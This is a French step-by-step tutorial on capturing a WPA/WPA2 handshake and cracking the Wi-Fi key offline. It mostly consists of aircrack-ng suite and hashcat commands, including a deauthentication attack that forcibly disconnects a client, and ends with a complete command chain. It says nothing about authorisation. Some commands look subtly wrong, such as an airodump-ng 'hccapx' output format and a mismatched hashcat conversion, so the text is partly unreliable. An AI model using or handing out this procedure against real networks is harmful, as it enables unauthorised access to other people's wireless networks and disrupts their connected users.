Capture et crack d'une clé WPA/WPA2 hors-ligne
Pour récupérer les données nécessaires pour casser une clé WPA (WPA2) hors-ligne, il faut capturer un handshake entre un client et le point d’accès (AP). Ce handshake contient les informations nécessaires pour forcer le calcul de la clé de chiffrement (PSK), ce qui permet de la casser ultérieurement avec des outils comme aircrack-ng, hashcat ou john the ripper.
Voici un tutoriel complet sous Linux pour capturer les données nécessaires à la crack offline d’une clé WPA/WPA2.
Matériel requis
- Une carte réseau compatible avec le mode monitor (ex: Alfa AWUS036ACS, TP-Link TL-WN725N, etc.)
- Un PC Linux (ou VM)
aircrack-ng(installé avecsudo apt install aircrack-ng)airmon-ng,aireplay-ng,airodump-ng
Étapes du tutoriel
1. Activer le mode monitor
# Vérifier les interfaces réseau
iwconfig
# Démarrer l’interface en mode monitor (remplacer wlan0 par ton interface)
sudo airmon-ng start wlan0
Cela créera une nouvelle interface comme
wlan0mon.
2. Scanner les réseaux Wi-Fi à proximité
sudo airodump-ng wlan0mon
- Notez l’BSSID (adresse MAC du point d’accès) et le canal.
- Exemple :
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH
00:11:22:33:44:55 -50 1234 5678 20 11 WPA2 CCMP PSK
3. Capturer le handshake
Maintenant, on va cibler un client connecté au réseau WPA, ou forcer une connexion via fake authentication.
Option A : Attendre qu’un client se connecte
# On capture les paquets sur le canal du réseau (ex: canal 6)
sudo airodump-ng -c 6 --band g -w capfile wlan0mon
Laissez cette commande tourner quelques minutes. Quand un client se connecte, un handshake est capturé.
Option B : Forcer un handshake via un client
Utilisez aireplay-ng pour forcer un client à se reconnecter :
# Lancer un fake authentification (remplacer BSSID par celui du réseau)
sudo aireplay-ng -1 0 -e "NomDuRéseau" -a 00:11:22:33:44:55 wlan0mon
01:23:45 Injection is working!
Ensuite, forcez un handshake :
# Forcer un deauth (déconnexion du client)
sudo aireplay-ng -0 1 -a 00:11:22:33:44:55 -c FF:EE:DD:CC:BB:AA wlan0mon
Remplacer
FF:EE:DD:CC:BB:AApar l’adresse MAC du client.
4. Vérifier la capture
aircrack-ng capfile-01.cap
# BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH
1 00:11:22:33:44:55 -50 1234 5678 20 11 WPA2 CCMP PSK
Choice: 1
1 handshake found
Cela signifie que le handshake est capturé. Le fichier
capfile-01.capcontient tout ce qu’il faut.
Résultats à récupérer
- Le fichier
.cap: contient le handshake. - Le BSSID (adresse MAC du point d’accès).
- Le SSID (nom du réseau).
- Optionnel : le MAC du client.
Étapes pour casser la clé WPA hors-ligne
1. Convertir le fichier .cap
Avec hashcat
sudo aircrack-ng -J handshake.hc capfile-01.cap
Générer un fichier .hccapx
sudo airodump-ng -c 6 --band g --output-format hccapx -w result wlan0mon
2. Utiliser hashcat
hashcat -m 2500 -a 0 handshake.hc /chemin/vers/wordlist.txt
-m 2500: type de hash WPA/WPA2-a 0: mode dictionnaire/chemin/vers/wordlist.txt: wordlist
Astuce : Wordlist
Utilisez une wordlist comme :
https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
ou générez-en une avec cewl.
Résumé des outils
| Outil | Utilité |
|---|---|
airodump-ng |
Scanner et capturer les paquets |
aireplay-ng |
Forcer des handshakes |
aircrack-ng |
Analyser et convertir les captures |
hashcat |
Cassage de clé WPA hors-ligne |
john |
Alternative à hashcat |
Exemple complet
# Démarrer le mode monitor
sudo airmon-ng start wlan0
# Scanner
sudo airodump-ng wlan0mon
# Capturer sur canal 6
sudo airodump-ng -c 6 --band g -w capfile wlan0mon
# Forcer un handshake
sudo aireplay-ng -0 1 -a 00:11:22:33:44:55 -c FF:EE:DD:CC:BB:AA wlan0mon
# Convertir en hashcat
sudo aircrack-ng -J handshake.hc capfile-01.cap
# Cassage avec hashcat
hashcat -m 2500 -a 0 handshake.hc /usr/share/wordlists/rockyou.txt